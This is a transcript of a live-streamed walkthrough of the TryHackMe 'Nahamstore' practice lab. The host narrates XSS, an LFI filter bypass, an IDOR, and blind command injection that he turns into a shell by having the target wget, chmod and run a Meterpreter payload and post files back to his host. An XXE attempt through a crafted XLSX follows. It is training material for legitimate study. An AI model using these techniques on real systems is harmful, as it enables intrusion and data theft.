Let's try that again with sound. Well, what's up, hackers? Welcome to Attack on Tuesday. My name is Taggart, and tonight we are continuing our exploration of the Nahamstore lab from Ben Sigedipur, or Nahamsec. We're doing his room on Try Hack Me, and we have a few things that we've successfully done so far, but there's more that we want to do. Knock off some of these options here, and I want to start, see if we can knock off some of this XSS or some of these other other ones that we had some success with last week. To start that, I want to do a little bit more enumeration. So we found a whole bunch of host names last time, and one of them was marketing.nahamstore.thm. The default that we found, that we started with, was nahamstore.thm. But we found a couple more, and I want to go after this a little bit more. So I'm going to do a port scan of just a Rust scan based port scan of just that, and we'll see how this goes. Aha, see port 8000. Okay, interesting. And let's get some music back. Very good. Okay. Now with that port 8000, we're going to try to visit that. So we're going to go to marketing.nahamstore.thm port 8000 and see what we have there. All right, looks like it is a site. This may be a shorter stream. Just it's already stupid hot here, so we'll see how long I can last under show lights with no AC here. All right, so it doesn't look like there's anything on the default landing page, but we definitely did get a 200. So we're going to add that to, oh, it's already in context because ports don't exclude context. So we're going to kill this, and we're going to run Ferox Buster on port. Let's get user share seclists, discovery, web content, big.txt, and let's put it on port 8000. And let's see how we do there. And we learned the trick, right, that Ferox Buster wants more window space, and that's why it was scrolling the way it was before. So we'll give it that window space. And I'm going to do a little bit of manual testing anyway. Let's see. Login. New admin. Oh, okay. And we'll try like admin. All right. I guess that works. So this is interesting. So /admin pre-opening interest. Let's see. So there's an edit button here. Now, obviously, I can get cross-site scripting going here because I can straight up like embed cross-site, right? I could embed JavaScript code into this, right? This is the form. That's not even difficult. Let's see, we'll hit update there. And then if we go to, which one did we just mess with? The pre-opening interest. So if we go now to pre-opening interest, we get an XSS pop-up. Now, I wonder, if there's something else that we can do with this. I don't know that this is true. I'm just taking a shot in the dark to see if there's PHP going on here. Maybe there's not. Oh, but there is. That's very exciting. That means that we can inject code to get our reverse shell. So 10.13.7.20 is our try hack me, and I'll use port 8888. And copy the reverse shell. We'll toss that in here. Looks good. Update that. And then let's get a netcat listener going. Interesting that we're still not finding much over here. I'm going to kill that and bring our windows a little bit over. Let's do quad 8s and let's go visit this thing and see what happens. Hey, look at that. There's a shell. So we're www-data, which, you know, doesn't give us a whole lot, but okay, we're at the root. Let's see. We knew from our fingerprinting that we were working with an Ubuntu machine, which means that if we are using Nginx, we should be, the default web root would be bar www.html. And sure enough, it is. There's marketing, and there's marketing port, and there's data. Right. Okay. And we also want to get some more enumeration going on. I had some real trouble making sure that we had all the host names that this thing responds to. So to avoid any doubt, we're going to cat etc nginx. Actually, we're going to first ls to see what's in there. ls etc nginx sites available. Okay, so we're going to cat that out. We're going to cat out etc nginx sites available default. Okay, so there's an 8000, which we saw. And there's an 80. And... interesting. Actually, not a whole lot of information there for us. Let's see, cat Etsy host names. Host name. Nothing particularly interesting there. Okay, netstat's not on here. I feel like I'm in a Docker container, to be honest with you. Let's cat Etsy password. Yeah, no real users. I'm pretty sure I'm inside of a container here, especially with that IP address. 172.17.0.6. Yeah. But hey, we got remote code executions, so let's look at the remote code execution section. Just flag.txt. Sure enough, cat flag.txt. Okay. And I think that's pretty much what we were looking for there. Except, these Docker containers may be networked in a way that I can take advantage of. So 172.17.0.5. Ugh. That cat's not found. Perl is not found. Yeah, there's nothing useful on here that I can load up. So I think we're gonna say goodbye to that shell for the moment. We know we can get it back if we want it, but all right, let's see. What else do we have? We have, oh yeah. So cross-site scripting. So I'm pretty sure this is marketing.nahamstore.thm, but I can't figure out exactly what's going on there. And it's not port 8000 because it doesn't have that. So let's just see. So marketing.naham, like, huh. Excuse me, a 404. Maybe it has to be the exact hash size. So let's just change it to like B. Oh, that's cool. Okay, so what we're looking at here says error campaign not found. Now this looks like reflected cross-site scripting. So what I'd want to try here is see if I can get it to inject like that. And sure enough, I can. So again, I would do image source equals X on error equals alert SS. Quotes would help. There we go. There's some cross-site scripting for us. Okay, so there's like slash error or slash question mark error was the actual. Nice. All right, we have found all the cross-site scripting that Ben created for us. We found the open redirect last time. Now, the recon, there was something else that I wanted to play with, which was, we can get out of marketing here for the moment. Oh, you know what? Actually, instead of doing it, let's play with file inclusion a little bit. So file inclusion, right? We knew that we have this picture, right, that has, it's loading a file with this file parameter. And that says to me that we should be able to mess with this a little bit. Now, I tried. Oh, it also tells us in the challenge that there's something at root lfi/flag.txt. But I should also be able to see Etsy password, right, if this is working. Now, I tried Etsy password. And it tells me the file does not exist. But there are sometimes so if I do a dot slash, right? That works. If I do a like dot slash images or pictures maybe. Static. But see, my concern is that it's filtering out this dot slash. So to fix this problem, what I'm going to do is, if it's just like doing a find and replace to remove those, what you do is you give it a dot and then a dot slash and then a dot slash, right? So what ends up happening, this is a little bit tricky to see, but if you filter out the dot slash, what you're left with is a dot slash. So we're going to see if we can trick it to do that. So we'll give it a bunch of these. And let's see if we can get Etsy password that way. Okay, I don't have permission to view that file, but it works. So there should be an LFI lfi/flag.txt for us. And it looks like it's trying to render a picture. But if we view the source, if we view the source, can I not view the page source? Why can't I? There we go. I don't know why I was being weird about that, but there's our flag. All right, making some progress now. The IDOR might be interesting. An existing user has an address in New York. Find the first line of the address. Let's close this and let's go back to store. Oh, I think I have to register a new account. Yeah, of course I do, because I restarted the machine. Okay, so let's go ahead and first of all add an address to our address book. Testerson. Just one street. Give it a zip code. All right. All right, we have ourselves an address. And interestingly, worth seeing what happens here, where we're doing a new address and then we get an address book and then we try to delete it. What happens? Oh, insane. Why isn't it tracking deletes for me? Oh, there you go. It says delete addresses equals 5. Now, can I mess with somebody else's? It says 200. But the way that I would actually need to test this is to see, I need to make another account, right? So let's remake somebody's address here. We'll add that address. Now, we're going to, in an incognito window here, we're going to create a new account. And we're going to do sort of the same thing. Okay. And if we inspect this, let's see what it says. Yeah, so the address ID value equals 7. So now I have this delete address. Let's rerun this. Oops, not fuzz it. Let's rerun it. Right, so if I send this, I get a 200. Now, if I reload this, is the record gone? It is not. Okay, so it looks like there is some protection there against that IDOR. However, we're not done testing. So there are other ways in which we use these addresses. So let's go ahead and view these. Let's add one of these to a basket. Go to our basket. Right, this part right here. See where it says hidden name equals address ID value equals 6? What if we change this to 7? We can do this actually in the browser. We don't even have to do it in the proxy. We can do it in the proxy, but we don't have to. Let's go ahead and try that though. Aha. So see how we got test 3 instead of Testerson, right? Because test 3 was the account that we created in the address we created in the other account, meaning we have found an IDOR vulnerability. So let's mark that actually. And annoyingly, there is no insecure direct object reference listing in Zap. So what I will list it as is application misconfiguration or abuse of functionality, potentially. And we'll call it high because, you know, people's addresses can be disclosed. Confidence is confirmed, and the parameter was address ID. And we'll call it IDOR here. All right, so we found another vulnerability. And so if we want to get this information, we would find let's go back, right, and change the value to 3. And then we should be able to see the information that we were looking for there. Nice. So 160 Broadway. And it looks like there is another one, and presumably that's going to be on orders, or returns rather. Or maybe it is on orders. Let's try order ID 3 date and time. Yeah, that didn't work. Let's place an order and see what happens. See if we can mess with it that way. We'll make this payment. Aha. There we go. So orders 3. So that PDF generator might be interesting because I'm posting to it, right? What order and ID equals 4. So let's try that again. And actually this time we're going to intercept it. We'll close this incognito window. All right, so we're going to intercept that this time by turning on the break right here. And then when we hit PDF receipt, Zap pops up, and I want to change that order ID 4 to order ID 3 and forward that along. Order does not belong to this user ID. Dang. I thought we were there. All right. Not sure what to do with that one. There might be some interesting bypasses. Nahamstore is really, really good with filtering bypasses, and I am not. Okay, so let's see if we can get that other remote code execution. What have we found so far that could be, well, there's a lot of stuff to fuzz potentially. And this is where, you know, using Zap the way it's intended to be used might actually be useful. So what I'm going to do is I'm going to set up Zap to actually run. Now, even when you set this up, you don't always want to set this up to run like crazy. And the reason being, you don't want it to run everywhere. And the reason being, we're going to do form-based authentication. Email, login, password. Yep, very good. And users. The reason why you don't want to fire it off against everything in a real test is that it's going to be very noisy. But in addition, you want to know what you're doing. So, you know, Zap's attack mode or even the active scan is a very, very powerful weapon. And it'll do damage to a site if you aren't very careful about it. So like, for example, this PDF generator, right? We were just playing with this. I can just attack this specifically. And technology is already set. So we can sort of fuzz this with the attacker in Zap to see if there's anything that shows up here. Order does not exist. These are interesting. So we can watch the progress here to see what it's doing. See if it's able to pull anything off here. And really, this is just, you know, saving time with some of its built-in fuzzers, right? See how it's... Oh, look at that. We got an extra alert. Remote OS command injection. It actually found something. Look at that. It found this on sleep. So sleep worked. Now, this is kind of a blind, right? Because we're not getting a response back, but that's really interesting. So what we're going to do is we're going to play with that a little bit more. So here, we're going to reopen this request editor, and instead of 3%, 22%, 26, say sleep 15, what we'll do is we'll set up a little request, a web server, right? And we'll just tell it to curl curl http://10.13.7.20 just to see if we can get any talk back. And we did. Which means we can set up ourselves a reverse shell. A couple of different ways there. Let's do it the stealthier way by doing a command injection that doesn't drop a file. We'll see if the bash one works. It may not. All right, so we're listening for that talkback. Let's send the request. Hey, Angel, good to see you. Looks like we didn't get a talkback there. Now, I think that might have to do with quotes. So we know that we can get curl going. Now, if I do just like PWD, do I get anything back? No, right? There's no, so it's blind. So what I'm going to do, that and needs to be decoded. No, it doesn't. Zap will take care of that for me. Anything that, for especially for form data, anything that is that needs to be URL encoded, it, even though it looks mix and matched in there, it'll clean it up for me on the outgoing. So what we want to do actually is all right, fine. Let's do it this way. Let's do, yep, works for me. Very nice banana looking lightning bolt pandemic avocado. All right, so I've created an interpreter launcher here, and I'm gonna go set up in MSF console. I'm gonna set up to use that thing. Use exploit multi-handler. And options. Set payload. Linux x64 interpreter. Reverse TCP. Set lhost 10.13.7.20 and lport to 8443. And we'll run that listener. Then coming back over to where we have the file, we're going to fire up a Python server so we can get the thing. And right in here, we're going to do wget. It should work. 10.13.10.13.7.20 port 8000 /mt. We'll fire that off. Looks good. And again, this is all blind. So the second thing we're going to do is chmod +x ./mt. And then we're going to just run ./mt. And if everything has gone according to plan, crap. Guess what? I set the lhost wrong. So we're going to try that all again. Okay. And then we'll see if we can chain this one. We'll do chmod +x ./mt semicolon /mt. See if we can get away with doing it in one. Maybe not. Well, we'll just... It's possible that I'm not able to write to wherever I am either. There's a lot of possibilities. So actually, this time we're going to wget, and wget has a -o, right? Yes, it does. Okay, so -o. Okay, capital O it is. No, you got it right. So we're going to send that to temp. Okay, there's the second hit. And now we're going to do chmod plus x. And finally, we're just going to run that thing. Still not getting any talkback on it, which is unfortunate. Probably ping myself and see if we can outbound. I'm not totally sure what you mean by that, Angel. We know we can get outbound because we got the wget. It might be a port thing. We'll try it here. We'll try this one more time. We'll try we'll try like super stupid. It's 64-bit. Well, actually, I don't know that it is, but I have every reason to believe that it's 64-bit. No, you know what? I know it would have to be, because even if it were yeah, I have every reason to believe it's 64-bit. Okay. What if it's just like 10, 15, 7.20, 889-E bin bash? Let's see if we can get file disclosure at least. It might not have netcat, which seems unlikely, but let's try the other reverse shell method? You know what? I'm done opening and closing that thing. I don't have to. I can have it in my inspector. Okay. 10.13.7.20, 8889, and oh, I like this. This one doesn't have any quotes, which I think was our problem before. Mm-mm. I'm gonna put it in backticks just to see what that does. Nothing. Let me make sure that we haven't broken anything else. Send to port 80 instead. We know that works. We also know port 8000 works. We'll do curl just so we don't download anything. Or we are, but yeah, see? Yeah. There we go. So we're getting, so the backticks do work. Okay, so we're getting somewhere here. Now, wget has a cool feature that I've never had occasion to use really, but post file. We can have it post something. So I am going to send hey, the flat. Oh, right. Unsupported method post. Well, that's okay. I have an answer for that too. It doesn't, Angel, but I have run into this before. Where am I going? Replit. And I have written a baby Flask server in the past that does this for me. So I'm going to go grab it. Yep. It's exactly what's happening. Come on, two-factor. Let's go. I really don't love Replic's sign in. This should have been through Authenticator. All right. Is this the one? Yup. All right. This should be all we need here. So, assuming we have Flask installed. Yes, good. Ugh. There we go. And wow, this is like a lot more complicated. Orbital, thank you for gifting the sub to Commander Root. This was for a proof of concept that was more complicated than what we're doing. Let's see. I feel like we're going down a rabbit hole that doesn't need to be gone down. I just need the data, right? So all I have to do is yeah, there we go. I was like, that's stupid. Yes, the Vim stream is going to be the Vim lesson you always wish you had. All right, well, that worked great. Which means, since Nahamstore had the challenge here was very specifically for RCE was to get /flag.txt, we just get that. There it is. I gotta remember to use that wget post file more often. That's really, really handy. Yeah, I know. Oof, it is warm in her. All right, let's see. So we actually got that. For those of you who just checked in, we actually found that command injection by running a specific active scan through Zap. So Zap actually found that one for us, and then we were able to take it further. Yeah, and I often like to use wget over curl just because there are fewer question marks for stability with wget, especially for downloading stuff. It handles that a little bit better. All right, let's recenter here. So we've got RCE. Yes, that would exist in burp, but in pro. And interestingly, one thing that I haven't enabled, but actually would make a lot of sense for this room in particular, is the community scripts for Zap. So let's just take a second to talk about that. So if we go to the plugin library for Zap, there's all this stuff that you can, add to it, including community scripts and custom payloads, all sorts of cool stuff, right? FuzzDB, we have all this stuff installed actually. But one of the things that you can do, so if I go to scripts, I open the scripts window here, and I go to the passive rules, I think. There's one called hunt.py, and this is literally just a Python script for bug hunting. What it does is it has a whole bunch of alerts that will trigger specifically for things that bug hunters would be looking for. So if we enable this as we go, hunt through our, go navigate through our site, hunt.py alerts will actually start firing down here that will give us specific information about things that we would be interested in if we were, doing bug bounty or doing things like this. Really, really cool, really, really handy stuff in here, right? Things looking for like possible file inclusion or path traversal. Yeah, I mean, it's not just even automated. Even if I were doing this manually, this is doing what it's doing is it's checking all the requests and responses coming in as I go through it so that it's looking for me rather than even if I don't do automated spidering, even if I'm manually exploring the site, it is doing the alerting for me, which is really handy. Yeah. Now it can do both, and as a matter of fact, um, you know, Zap has a whole automation API and that you can play with. There's even there's even now a syntax for YAML files that you can give it to just fire off a whole scan from a YAML file rather than manually setting everything up, which is kind of neat. All right. So we still haven't figured out this other eye door. I strongly recommend it. Um, I know burp is really, really powerful, but I'll tell you what, Zap was good enough to get me through at least the EWPT. I didn't open burp once for the EJPT or the EWPT. Yep. And we have done exactly that. I'm feeling like this PDF generator is bugging me because, obviously we just went to town on it here, but like, if we do ID equals 3, it's going to tell us that that's big, right? So not authorized. What if I give it like a... What? This is a PDF. I think. Yeah. We'll save the response. body as a order 3.pdf. Cannot find order 3. That's very funny. All that was just to see that cannot find order 3. We could have looked at that in the browser, I guess. But it didn't tell us that we were unauthorized. What if we, like, I don't know. Whoa. Whoa. No, it was not the same size. If it had been, it would have been. It wouldn't have. It would have shown it to me. But 10,347 bytes. Well, we don't even have to guess. Look, 9.7. So maybe it's the same. But we saw it before. Oh, interesting. Order does not belong to this user ID. It's the exact same size. Pretty sure. No, it's not. Order does not belong to this user ID. Okay, but we can fuzz that. I mean, we don't know that this is anything, but it's interesting that it was written as like user underscore ID. So if we create an order and then try to access it from the other user. Yeah, except here's the thing. We're actually after a specific order, Angel. So what we need to do is find the user it belongs to. Do we know the user ID parameter before? Not really, but we're guessing it from the error message. So I'm gonna find this fuzzer here, and we're gonna do payloads. This is cool. We're gonna do add numbers. We'll just do like 1 to 10. What the hell? Still got time on it. Do I have to mark the position? I do, and I did. Yeah, so the way you do it in Zap is you highlight it and then click fuzz. See how it's marked here? So this is how you do it in Zap. Do this one more time. Boy, it doesn't like that. Okay. We'll leave that one alone for a moment. Let's... So it's not that nothing worked, it's that there was some failure in the way that the request was sent. Because what I should be seeing is the history of requests coming down here. Let me show you another one, just as an example. Let's fuzz something else. Here we go. Let's fuzz product ID equals 1. We'll do 0 to 10. There should only be 2 that work, but just to show you how it works. What is happening? Okay, time to restart Zap. That's not behaving correctly. No, I don't have to hit save. It saves the session for me constantly. And we'll just open that right back up. And we'll... Yep, Zap is still being developed very, very actively. All right, let's try that fuzz again. So I want to give that another shot. I think you should. I think everybody should. I don't know why it has such a weird, bad rap. And from the UI standpoint, like, I gotta tell you, I had way more trouble getting around the burp UI than I did the Zap UI. It's one window. That is just not happening. That's true. It is definitely hard to relearn one tool another. You get stuck with what you know. I'm beginning to wonder if we did something not great to the server. Because nothing appears to be loading anymore. Yeah. Okay. Let's Let's try that again. All right. And then let's just regroup here for a minute. So still haven't found this SSN. I feel like there's probably another subdomain that we don't know about. And the Hack the Box business CTF is starting. That's going to be fun. Yeah, absolutely. By the way, if anybody is interested in getting some really easy system owns on Windows boxes on Hack the Box, now is your chance, because good lord, Print Nightmare is an easy button. Serious Sam is fun, but it's actually a little bit more annoying to use because you have to, yeah, Print Nightmare is the way to go, I feel like, for that. With Serious Sam, you're going to need to, first of all, have a shadow copy that you can get access to. So it has to be doing that. And a lot of times the VMs won't be, because System Restore is disabled by default, or it's set up by the hypervisor. But LPE is not patched correctly. RPE is patchable. Are you talking about Print Nightmare? Yes, that is true. That's what I'm saying. That if you, once you get on the machine, Print Nightmare is a one-stop move to get system, right? Or to get an admin user on the machine. All right, let's 155, 123. Micropatch fixes both, but the VMs don't, on Hack the Box, don't have them. They're not patched. I agree with you, though. Yeah, I wish it were more real. I wish that people were patched in real life. I have a feeling that, as usual, this thing's going to hang around a lot longer than we'd prefer. 155, 123. All right. Let's try this again. So that is basically like said what I just did. Yeah, let me quick preview of tomorrow's Hack Summer. Yeah, so I'm in Vim, right? I'm editing the Etsy host file. And what I did here was so breaking down this command, the % represents the current buffer. So that's whatever file we're working in. And then S is substitute. So just like said, exactly right. And then the / for what we're going to be replacing, and then another / for what we're going to be replacing it with, and the G for global, meaning we're going to go throughout every instance that it finds, not just the first one. Exactly right. And I'm escaping the dots because it's regular expression, so dots mean any single character. Okay. Now I'm going to have to recreate my account. And I have to make an order now. All these things. Okay. Now, orders. Wonderful. PDF receipt. Now, with that done, let's try this fuzz one more time. I'm not giving up on this. So first thing is we're going to and user ID equals 3. 24,752. Hey, this one gave us back a larger file. Oh, wait. I changed the wrong dang thing. There we go. That's what I was expecting. Okay. So here... payloads. Numbers. 210. Boy, it hates something that we're doing with that. I wonder if they're coming too fast. I think we're just crashing the PDF generator is the problem. Yeah, we can absolutely do that. We can absolutely write our own. Well, the truth is that we can also just go slower with the manual, because the manual requester is working fine. So since we're doing so few of them, what we'll do first of all is 132, 167. Here we go again. Let's register. Let's order a hoodie and a t-shirt. Another address. Okay, orders. Okay, so here we're going to go back to our history. And we're going to do order ID equals 3 and user ID. We'll try equals 1. Can I configure the speed? I actually think I can. Let's answer that question. Options. Delay when fuzzing. Yes, I can in fact delay when fuzzing. And we'll drop it down to 1 thread. Yeah, first though, we gotta modify this to get and user ID equals 1 and the order ID equals 3. Okay. I mean, honestly, we can just do this manually. 10, 3, 4, 7. 10, 3, 4, 7. I don't think we're gonna make this happen here. Yeah, it should be a lure. I feel like this should work. What? What? URL encoding the ampersand worked. Okay. I... Uh... Okay. The URL encoding of the ampersand worked. I don't entirely grasp why, but all right. I guess that's a good lesson, is that, you know, try to get around stuff by changing the encoding. See what happens. You never know, right? Fuzz everything. I mean, I guess it's like injected, except that it's taking the user ID, right? It's using the user ID, but for whatever reason, it's using it when the ampersand, it's like, because it's form data, but only when it's encoded this way. Very strange. Okay. I want to get the XXE tonight. I really do. I think I know where it would be. We found this thing last time, which is stock.nahamstore. .thm, and speaking of fuzzing, we're going to use FFUF to fuzz this thing. And we're going to use user share secless discovery web content API, and we'll do common paths.txt. Okay, I guess we're going to do something else. Objects.txt. You know what? Some of these are in weird shapes. So let me quickly vim these up. User share word list. Nope. Secless discovery web content API common paths. Yeah, see? /API v1. Okay. I'm into it. I like the objects one. It's the right shape. Increase the pane, otherwise the output will be weird. Correct. Product, which we know about. Okay. Let's do product/fuzz. Okay. One and two, which we kind of knew about. Now, I want it to give me XML. A lot of times APIs are configured to give you both XML and JSON, depending on what you ask for. Now what happens if we give it application XML? Nothing really, except missing header X token. Okay. Well, it seems to get. Let's try get params. Like so. Product one fuzz. Oh, dang it. Oh, fish shell. All right, so we're getting a lot of responses back, right? but they're all the same size. So what we're going to do is we're going to filter the size for 41. Well, well, well. See, you got to learn to think like Ben a little bit. There's like every possible thing to be fuzzed, right? Okay. Size 88. What does that look like? Okay. Now, I'm going to post this thing first. I can do this in Zap. And we're going to give it hey, we're getting XML back. This is invalid XML supplied. So we'll give it some XML. And I'm just going to go to payloads, all the things, and get our XXE up here. Yeah. Now this might not work out the way that we want, but we'll give it a shot. So X token not supplied. So what we're going to do is see if we can get that to work inside of basically an XML element. That's how it was described, right? X token. Yep. Oh, that feels good. Now, can we do fun ones? Like expect. Damn. It is expect, right? Yeah, it's a PHP wrapper. I was just hoping that it was present here. Well, then, we'll do the DTD version. What are we supposed to be getting out of here? Oh, just flag.txt. All right, that's one of them. And then there's a blind one, too. Not really sure where that one's supposed to go. Well, we were already able to get Etsy password with the file inclusion. I mean, usually what you would do in that case, like the reason why you would do like the DTD version of that is if you were running into, yeah, but the reason you can do it that way, but at the moment, I'm not sure what else I'd want to exploit here. I know that without the PHP stuff, I can't really convert this into remote code execution, even if I were to do the DTD relay. But if there was someplace else. Wait, for real? Yeah, it's just that we're able to exfiltrate data from this already. It's a different endpoint that we're looking for. I'm quite confident of that. The reason I'm saying that is, again, so the reason why you would want to do some of these blinds, like pulling in a DTD from something else, is so you could do like basic C4 encoding or do something else like that. I went deep on XXC for a vulnerability that I can't talk about just yet. Recently, but I think we've pretty much hit this one. We gotta find someplace else. And if I remember correctly, there was like a, yeah, see right here. I think this is the other one. So what I really want to look up is XXC XLSX. Oh wait, I should probably have checked to see if that was on payloads.
All the things. There we go. Okay. I think this is what we want. Okay, so we're going to mkdir unzip. Okay, so basically I need to make an XLSX file, which I will do. Let me make a... And then have calc on here, right? Yeah, okay. Save as. Hey, Husky, good to see you. Well, my upload is straight trash right now. Sorry for the unbelievably low frame rate. I don't know what's up with that. Well, the same thing that's up always. Let me make the damn thing first. Okay. Yeah. I did enumerate this for XLSX files and like the uploads and stuff, and I wasn't able to find anything. So let's see what happens if I just toss it. Honestly, it might just be the heat orbital. Okay. So it uploads those just fine. All right. So we're going to unzip this thing, right? Let's close it because I don't need it open anymore. cdxxe. We're going to unzip xxe.xlsx. Cool. And we're going to listen on 8,000. So basically just this. Okay, see. Just do like the rest of the Twitch streams hot tub. I don't really think that that would have the same effect for me as it does for Amaranth. That's my supposition. Okay. And then let's get rid of this. .15.7.20 for 8,000. Plus there's the electrocution risk. True. Right. Except that except that that's what we want. we'll host the DTD here. Right, so this is the payload, right? Because this will just hit, like, this. If this was burp collaborator, this would just hit the burp collaborator, but it wouldn't actually give me any information. What I want it to do is send that information to me. And so I need to combine a couple of these techniques. Yeah. There we go. This is what I want. I want to do this. No. There we go. So I'm gonna do yes. That's what we want. Especially because what we're looking for is /flag.txt. Here, I'm going to do yeah. Okay. And then we're going to zip all this back up together. Okay. And now dang. Yeah, that should have worked. Unless we need to do a DTD and read it there. Is this thing... Ah, see, this thing actually is PHP enabled, I think. But, guys, I think we're going to have to call it for tonight just based on time and literally temperature. So, tomorrow night, Hack Summer. Don't miss it. If you want to learn how to use Vim, this is your moment. We are going to be going over all things Vim tomorrow at 5 p.m. Pacific. So, thank you for hanging out. Hope you had a good time, and I will see you next time. Let's see if we can send you someplace. See if anybody's else streaming. Not that I see. So, we will call it a night. Thanks everybody, and be good to yourselves, be good to each other, and we will see you next time.